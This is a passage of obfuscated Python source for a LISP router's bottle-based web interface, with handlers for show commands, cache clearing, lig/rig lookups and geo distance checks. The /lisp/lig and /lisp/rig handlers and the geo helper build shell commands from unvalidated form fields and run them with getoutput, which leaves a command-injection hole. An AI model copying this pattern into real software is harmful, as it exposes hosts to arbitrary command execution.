    # Redirect unauthenticated sessions to the login page.
    if (lispconfig.lisp_validate_user() == False):
        return (OOoO0())
    if 25 - 25: oO0o
    if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
    if 43 - 43: I1ii11iIi11i - iII111i
    if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
    if 47 - 47: iII111i
    # Clearing state is restricted to superusers.
    if (lispconfig.lisp_is_user_superuser(None) == False):
        iIiIIIi = lisp.lisp_print_sans("Not authorized")
        return (lispconfig.lisp_show_wrapper(iIiIIIi))
    if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
    if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
    # Build the IPC command string (O0ooo0O0oo0), pick the LISP process
    # that receives it (iIii11iI1II), and compose the HTML status message
    # (I1II1I1I) shown to the browser afterwards.
    O0ooo0O0oo0 = "clear"
    if (name == "referral"):
        iIii11iI1II = "lisp-mr"
        I1II1I1I = "Referral"
    elif (itr_name == "map-cache"):
        iIii11iI1II = "lisp-itr"
        I1II1I1I = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
    elif (rtr_name == "map-cache"):
        iIii11iI1II = "lisp-rtr"
        I1II1I1I = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
    elif (etr_name == "stats"):
        iIii11iI1II = "lisp-etr"
        I1II1I1I = ("ETR '{}' decapsulation <a href='/lisp/show/" + "database'>stats</a>").format(stats_name)
        if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
        # Stats clears carry the entry name in the command: "clear%<name>".
        O0ooo0O0oo0 += "%" + stats_name
    elif (rtr_name == "stats"):
        iIii11iI1II = "lisp-rtr"
        I1II1I1I = ("RTR '{}' decapsulation <a href='/lisp/show/" + "rtr/map-cache'>stats</a>").format(stats_name)
        if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
        O0ooo0O0oo0 += "%" + stats_name
    else:
        iIiIIIi = lisp.lisp_print_sans("Invalid command")
        return (lispconfig.lisp_show_wrapper(iIiIIIi))
    if 38 - 38: O0 - IiII % I1Ii111
    if 64 - 64: iIii1I11I1II1
    if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
    if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
    if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
    # Wrap the command for IPC delivery and send it from lisp-core to the
    # selected process over the Ooo IPC socket.
    O0ooo0O0oo0 = lisp.lisp_command_ipc(O0ooo0O0oo0, "lisp-core")
    lisp.lisp_ipc(O0ooo0O0oo0, Ooo, iIii11iI1II)
    if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
    if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
    if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
    if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
    # If static "lisp map-cache" clauses exist in lisp.config, touch the
    # file -- presumably so the config is reread and those static entries
    # are re-installed after the clear (TODO confirm against lisp-core).
    III1I1 = getoutput("egrep 'lisp map-cache' ./lisp.config")
    if (III1I1 != ""):
        os.system("touch ./lisp.config")
    if 12 - 12: iIii1I11I1II1 % ooOoO0o % ooOoO0o
    if 78 - 78: IiII . OoOoOO00 . I11i
    iIiIIIi = lisp.lisp_print_sans("{} cleared".format(I1II1I1I))
    return (lispconfig.lisp_show_wrapper(iIiIIIi))
if 97 - 97: oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
@bottle.route('/lisp/show/map-server')
def o0o0O00():
    """Web handler: show map-server information."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show map-server")
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
@bottle.route('/lisp/show/database')
def OO0o0oO0O000o():
    """Web handler: show configured database-mappings."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show database-mapping")
if 34 - 34: ooOoO0o
if 27 - 27: I1Ii111 + OoooooooOO - OoOoOO00
if 15 - 15: oO0o / I11i * O0 . II111iiii - OoO0O00
if 90 - 90: oO0o
if 94 - 94: I11i / I1ii11iIi11i * I1Ii111 - OoOoOO00
if 44 - 44: Ii1I % i11iIiiIii - iII111i * I1ii11iIi11i + Oo0Ooo * OOooOOo
if 41 - 41: O0 * ooOoO0o - OoOoOO00 . Ii1I
@bottle.route('/lisp/show/itr/map-cache')
def oO():
    """Web handler: show the ITR map-cache."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show itr-map-cache")
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
@bottle.route('/lisp/show/itr/rloc-probing')
def O0oo0O0():
    """Web handler: show ITR RLOC-probing state."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show itr-rloc-probing")
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
if 24 - 24: o0oOOo0O0Ooo
if 10 - 10: o0oOOo0O0Ooo % Ii1I / OOooOOo
if 28 - 28: OOooOOo % ooOoO0o
if 48 - 48: i11iIiiIii % oO0o
if 29 - 29: iII111i + i11iIiiIii % I11i
@bottle.post('/lisp/show/itr/map-cache/lookup')
def oOo00Ooo0o0():
    """Web handler: look up one EID in the ITR map-cache."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        page = "Address '{}' has invalid format".format(eid)
        page = lisp.lisp_print_sans(page)
        return lispconfig.lisp_show_wrapper(page)

    command = "show itr-map-cache" + "%" + eid
    return lispconfig.lisp_process_show_command(Ooo, command)
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
@bottle.route('/lisp/show/rtr/map-cache')
@bottle.route('/lisp/show/rtr/map-cache/<dns>')
def O0o00o000oO(dns=""):
    """Web handler: show the RTR map-cache.

    When the URL suffix is "dns", show the DNS-name view instead.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    command = "show rtr-map-cache-dns" if dns == "dns" else "show rtr-map-cache"
    return lispconfig.lisp_process_show_command(Ooo, command)
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
@bottle.route('/lisp/show/rtr/rloc-probing')
def i1i111Iiiiiii():
    """Web handler: show RTR RLOC-probing state."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show rtr-rloc-probing")
if 93 - 93: iIii1I11I1II1 + I1IiiI + i11iIiiIii
if 74 - 74: I11i / II111iiii + ooOoO0o * iIii1I11I1II1 - I1Ii111 - OoO0O00
if 69 - 69: iIii1I11I1II1 * I1IiiI - iII111i + O0 + O0
if 65 - 65: I1Ii111 / i11iIiiIii / OoO0O00 - OOooOOo
if 9 - 9: I1IiiI / I1Ii111 - Oo0Ooo * iIii1I11I1II1
if 86 - 86: II111iiii + ooOoO0o + IiII
if 9 - 9: ooOoO0o + II111iiii % ooOoO0o % IiII + iIii1I11I1II1
@bottle.post('/lisp/show/rtr/map-cache/lookup')
def oO00():
    """Web handler: look up one EID in the RTR map-cache."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        page = "Address '{}' has invalid format".format(eid)
        page = lisp.lisp_print_sans(page)
        return lispconfig.lisp_show_wrapper(page)

    command = "show rtr-map-cache" + "%" + eid
    return lispconfig.lisp_process_show_command(Ooo, command)
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
@bottle.route('/lisp/show/referral')
def i1iiii():
    """Web handler: show the DDT referral-cache."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show referral-cache")
if 8 - 8: OoOoOO00 * Oo0Ooo / IiII % Ii1I - I1IiiI
if 71 - 71: iII111i
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
@bottle.post('/lisp/show/referral/lookup')
def OoO():
    """Web handler: look up one EID in the DDT referral-cache."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        page = "Address '{}' has invalid format".format(eid)
        page = lisp.lisp_print_sans(page)
        return lispconfig.lisp_show_wrapper(page)

    command = "show referral-cache" + "%" + eid
    return lispconfig.lisp_process_show_command(Ooo, command)
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
@bottle.route('/lisp/show/delegations')
def ooo000oOO():
    """Web handler: show DDT delegations."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    return lispconfig.lisp_process_show_command(Ooo, "show delegations")
if 92 - 92: Oo0Ooo / i11iIiiIii + I1ii11iIi11i
if 87 - 87: OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
if 35 - 35: IiII . O0 + Oo0Ooo + OOooOOo + i1IIi
if 65 - 65: O0 * I1IiiI / I1IiiI . OoOoOO00
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
@bottle.post('/lisp/show/delegations/lookup')
def O0O():
    """Web handler: look up one EID in the DDT delegations."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        page = "Address '{}' has invalid format".format(eid)
        page = lisp.lisp_print_sans(page)
        return lispconfig.lisp_show_wrapper(page)

    command = "show delegations" + "%" + eid
    return lispconfig.lisp_process_show_command(Ooo, command)
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
if 81 - 81: IiII / OoOoOO00 * IiII . O0
if 61 - 61: OoO0O00 * OOooOOo + I1Ii111 . iIii1I11I1II1 % I11i . I1Ii111
@bottle.route('/lisp/show/site')
@bottle.route('/lisp/show/site/<eid_prefix>')
def O0o0oo0oOO0oO(eid_prefix=""):
    """Web handler: show LISP site registrations, optionally one EID-prefix."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    command = "show site"

    if eid_prefix != "":
        command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
    return lispconfig.lisp_process_show_command(Ooo, command)
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
if 83 - 83: IiII / I1Ii111
if 64 - 64: OoO0O00 % IiII . I1Ii111 % OoO0O00 + I11i * IiII
if 83 - 83: o0oOOo0O0Ooo % oO0o + I11i % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % oO0o + O0 / OoooooooOO
if 52 - 52: Ii1I % OOooOOo * I1IiiI % I11i + OOooOOo / iII111i
if 80 - 80: OoooooooOO + IiII
@bottle.route('/lisp/show/itr/dynamic-eid/<eid_prefix>')
def O00O(eid_prefix=""):
    """Web handler: show ITR dynamic-EID state, optionally one EID-prefix."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    command = "show itr-dynamic-eid"

    if eid_prefix != "":
        command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
    return lispconfig.lisp_process_show_command(Ooo, command)
if 37 - 37: i11iIiiIii + I1IiiI . OOooOOo % I11i % I11i
if 26 - 26: O0
if 34 - 34: ooOoO0o * I1Ii111
if 97 - 97: i11iIiiIii % oO0o / Oo0Ooo / Oo0Ooo
if 97 - 97: II111iiii - I1Ii111 - iIii1I11I1II1 * I1IiiI
if 54 - 54: iIii1I11I1II1
if 5 - 5: IiII
@bottle.route('/lisp/show/etr/dynamic-eid/<eid_prefix>')
def Oo0O0oo0o00o0(eid_prefix=""):
    """Web handler: show ETR dynamic-EID state, optionally one EID-prefix."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    command = "show etr-dynamic-eid"

    if eid_prefix != "":
        command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
    return lispconfig.lisp_process_show_command(Ooo, command)
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
@bottle.post('/lisp/show/site/lookup')
def IiII1i1iI():
    """Web handler: longest-match lookup of one EID in the site cache."""
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    eid = bottle.request.forms.get("eid")
    if lispconfig.lisp_validate_input_address_string(eid) == False:
        page = "Address '{}' has invalid format".format(eid)
        page = lisp.lisp_print_sans(page)
        return lispconfig.lisp_show_wrapper(page)

    command = "show site" + "%" + eid + "@lookup"
    return lispconfig.lisp_process_show_command(Ooo, command)
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
@bottle.post('/lisp/lig')
def iii():
    """Web handler: run the lisp-lig tool and render its output.

    Form fields: "eid" (required), "mr" (map-resolver, defaults to
    localhost), "count" (optional packet count), and "no-nat" which adds
    "no-info" to the lig command line.
    """
    if lispconfig.lisp_validate_user() == False:
        return OOoO0()

    eid = bottle.request.forms.get("eid")
    mr = bottle.request.forms.get("mr")
    count = bottle.request.forms.get("count")
    no_info = "no-info" if bottle.request.forms.get("no-nat") == "yes" else ""

    if mr == "":
        mr = "localhost"

    if eid == "":
        page = "Need to supply EID address"
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(page))

    # Locate whichever flavor of the lig tool is installed; later checks
    # override earlier ones, so plain source is preferred.
    lig = ""
    if os.path.exists("lisp-lig.pyo"):
        lig = "python -O lisp-lig.pyo"
    if os.path.exists("lisp-lig.pyc"):
        lig = "python3.8 -O lisp-lig.pyc"
    if os.path.exists("lisp-lig.py"):
        lig = "python lisp-lig.py"

    if lig == "":
        page = "Cannot find lisp-lig.py or lisp-lig.pyo"
        return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(page))

    if count != "":
        count = "count {}".format(count)

    command = '{} "{}" to {} {} {}'.format(lig, eid, mr, count, no_info)

    page = getoutput(command)
    page = page.replace("\n", "<br>")
    page = lisp.convert_font(page)

    # Indent well-known output keywords so the rendered text lines up.
    for pad, kw in [(2, "RLOC:"), (2, "Empty,"), (4, "geo:"), (4, "elp:"),
                    (4, "rle:")]:
        page = page.replace(kw, lisp.space(pad) + kw)

    return lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(page))
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
@bottle.post('/lisp/rig')
def i111I11I():
    """Web handler: run the lisp-rig tool and render its output.

    Form fields: "eid" (required), "ddt" (DDT node, defaults to
    localhost), and "follow" which adds "follow-all-referrals" to the
    rig command line.
    """
    if (lispconfig.lisp_validate_user() == False):
        return (OOoO0())

    eid = bottle.request.forms.get("eid")
    ddt = bottle.request.forms.get("ddt")
    follow = "follow-all-referrals" if bottle.request.forms.get("follow") == "yes" else ""

    if (ddt == ""): ddt = "localhost"

    if (eid == ""):
        page = "Need to supply EID address"
        return (lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(page)))

    # Locate whichever flavor of the rig tool is installed; later checks
    # override earlier ones, so plain source is preferred.
    rig = ""
    if os.path.exists("lisp-rig.pyo"): rig = "python -O lisp-rig.pyo"
    #
    # Bug fix: this branch used to launch lisp-rig.pyo after testing for
    # lisp-rig.pyc, which fails when only the .pyc is installed (compare
    # the lisp-lig handler, which runs the .pyc it found).
    #
    if os.path.exists("lisp-rig.pyc"): rig = "python3.8 -O lisp-rig.pyc"
    if os.path.exists("lisp-rig.py"): rig = "python lisp-rig.py"

    if (rig == ""):
        page = "Cannot find lisp-rig.py or lisp-rig.pyo"
        return (lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(page)))

    command = '{} "{}" to {} {}'.format(rig, eid, ddt, follow)

    page = getoutput(command)
    page = page.replace("\n", "<br>")
    page = lisp.convert_font(page)

    # Indent the "Referrals:" keyword so the rendered text lines up.
    indented = lisp.space(2) + "Referrals:"
    page = page.replace("Referrals:", indented)
    return (lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(page)))
if 17 - 17: O0 - OoOoOO00
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
if 64 - 64: I11i + OoO0O00
if 25 - 25: I1IiiI . ooOoO0o + I1IiiI % Ii1I * iIii1I11I1II1
def iiI1iI(eid1, eid2):
    """Resolve an EID and an EID-prefix to geo strings using lisp-lig.

    Runs the bundled lisp-lig tool against the first map-resolver found in
    ./lisp.config.  For each of the two inputs, a string that already parses
    as a geo string is passed through unchanged; otherwise lisp-lig is run
    and the "geo: " field of its output is extracted.

    Returns a 2-element list [geo_for_eid1, geo_for_eid2].  Entries are None
    when a lookup fails, and [None, None] is returned when no lisp-lig
    program or no map-resolver can be found.
    """
    lig = None
    if os.path.exists("lisp-lig.pyo"): lig = "python -O lisp-lig.pyo"
    if os.path.exists("lisp-lig.pyc"): lig = "python3.8 -O lisp-lig.pyc"
    if os.path.exists("lisp-lig.py"): lig = "python lisp-lig.py"
    if lig is None: return [None, None]

    #
    # Pull the first map-resolver "address = " or "dns-name = " value out of
    # ./lisp.config.
    #
    config = getoutput("egrep -A 2 'lisp map-resolver {' ./lisp.config")
    mr = None
    for keyword in ["address = ", "dns-name = "]:
        mr = None
        offset = config.find(keyword)
        if offset == -1: continue
        mr = config[offset + len(keyword)::]
        offset = mr.find("\n")
        if offset == -1: continue
        mr = mr[0:offset]
        break
    if mr is None: return [None, None]

    #
    # Look up each supplied EID.  Literal geo strings pass through untouched.
    #
    parser = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
    geos = []
    for eid in [eid1, eid2]:
        if parser.is_geo_string(eid):
            geos.append(eid)
            continue

        command = '{} "{}" to {} count 1'.format(lig, eid, mr)

        #
        # Try the plain lookup first, then retry with " no-info" appended.
        # Bug fix: the original ran getoutput() on the base command in both
        # iterations, so the " no-info" retry never actually executed.
        #
        for attempt in [command, command + " no-info"]:
            output = getoutput(attempt)
            offset = output.find("geo: ")
            if offset == -1:
                # Append None only after the second (final) attempt fails.
                if attempt != command: geos.append(None)
                continue
            output = output[offset + len("geo: ")::]
            offset = output.find("\n")
            if offset == -1:
                if attempt != command: geos.append(None)
                continue
            geos.append(output[0:offset])
            break
    return geos
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
@ bottle . post ( '/lisp/geo' )
def o0OO0oooo ( ) :
    # Web UI handler for POST /lisp/geo.  Reads a "geo-point" and a
    # "geo-prefix" form field (each either a literal geo string or an EID
    # that is resolved via the lisp-lig helper), then renders both geo URLs,
    # the distance between them, and whether the point lies inside the
    # prefix's circle.
    if ( lispconfig . lisp_validate_user ( ) == False ) :
        return ( OOoO0 ( ) )
    if 40 - 40: I1Ii111 - OoOoOO00 * I11i - IiII / OoOoOO00
    if 71 - 71: oO0o / OoooooooOO % IiII / OoOoOO00 % I1Ii111
    # Raw form inputs; iIiIIIi accumulates an error message ("" = no error).
    O0OoO0o = bottle . request . forms . get ( "geo-point" )
    I1i1iI = bottle . request . forms . get ( "geo-prefix" )
    iIiIIIi = ""
    if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
    if 46 - 46: OoOoOO00 - O0
    if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
    if 49 - 49: o0oOOo0O0Ooo
    if 25 - 25: iII111i . OoooooooOO * iIii1I11I1II1 . o0oOOo0O0Ooo / O0 + Ii1I
    # Scratch address used only for is_geo_string() tests, two geo objects
    # to parse into, and the lisp-lig lookups for both inputs at once.
    ooo0o0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
    O00Oooo00 = lisp . lisp_geo ( "" )
    ooO0 = lisp . lisp_geo ( "" )
    ii111iiIii , oO0oiIiI = iiI1iI ( O0OoO0o , I1i1iI )
    if 46 - 46: iII111i
    if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
    if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
    if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
    if 65 - 65: ooOoO0o - i1IIi
    # Parse the geo-point: either the literal form field or the value the
    # lookup returned for it.
    if ( ooo0o0 . is_geo_string ( O0OoO0o ) ) :
        if ( O00Oooo00 . parse_geo_string ( O0OoO0o ) == False ) :
            iIiIIIi = "Could not parse geo-point format"
        if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
    elif ( ii111iiIii == None ) :
        iIiIIIi = "EID {} lookup could not find geo-point" . format (
            lisp . bold ( O0OoO0o , True ) )
    elif ( O00Oooo00 . parse_geo_string ( ii111iiIii ) == False ) :
        iIiIIIi = "Could not parse geo-point format returned from lookup"
    if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
    if 34 - 34: I1Ii111 - OOooOOo
    if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
    if 64 - 64: i1IIi
    if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
    if 25 - 25: II111iiii / OoO0O00
    # Same for the geo-prefix, but only if the geo-point parsed cleanly.
    if ( iIiIIIi == "" ) :
        if ( ooo0o0 . is_geo_string ( I1i1iI ) ) :
            if ( ooO0 . parse_geo_string ( I1i1iI ) == False ) :
                iIiIIIi = "Could not parse geo-prefix format"
            if 64 - 64: O0 % ooOoO0o
        elif ( oO0oiIiI == None ) :
            iIiIIIi = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( I1i1iI , True ) )
            if 40 - 40: o0oOOo0O0Ooo + I11i
        elif ( ooO0 . parse_geo_string ( oO0oiIiI ) == False ) :
            iIiIIIi = "Could not parse geo-prefix format returned from lookup"
        if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
    if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
    if 47 - 47: OoooooooOO
    if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
    if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
    if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
    if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
    # No errors: build the HTML result string.
    if ( iIiIIIi == "" ) :
        # Show the original EID text only when it differed from the geo
        # string the lookup produced (i.e., the input really was an EID).
        O0OoO0o = "" if ( O0OoO0o == ii111iiIii ) else ", EID {}" . format ( O0OoO0o )
        I1i1iI = "" if ( I1i1iI == oO0oiIiI ) else ", EID-prefix {}" . format ( I1i1iI )
        if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
        if 26 - 26: OOooOOo * Oo0Ooo
        i1iI1Ii11Ii1 = O00Oooo00 . print_geo_url ( )
        o0OoO0oo0O0o = ooO0 . print_geo_url ( )
        ii1III1iiIi = ooO0 . radius
        # Decimal lat/lon pairs rounded to 6 places for display.
        I1ii1iI = O00Oooo00 . dms_to_decimal ( )
        I1ii1iI = ( round ( I1ii1iI [ 0 ] , 6 ) , round ( I1ii1iI [ 1 ] , 6 ) )
        ooO000OO = ooO0 . dms_to_decimal ( )
        ooO000OO = ( round ( ooO000OO [ 0 ] , 6 ) , round ( ooO000OO [ 1 ] , 6 ) )
        i111IIiIiiI1 = round ( ooO0 . get_distance ( O00Oooo00 ) , 2 )
        OO0 = "inside" if ooO0 . point_in_circle ( O00Oooo00 ) else "outside"
        if 28 - 28: Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
        if 82 - 82: Oo0Ooo
        # HTML spacing helpers of different widths.
        IIIIIi11111iiiII1I = lisp . space ( 2 )
        I1I1i = lisp . space ( 1 )
        iii1IiI1i = lisp . space ( 3 )
        if 93 - 93: i1IIi % OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo . O0 % OOooOOo
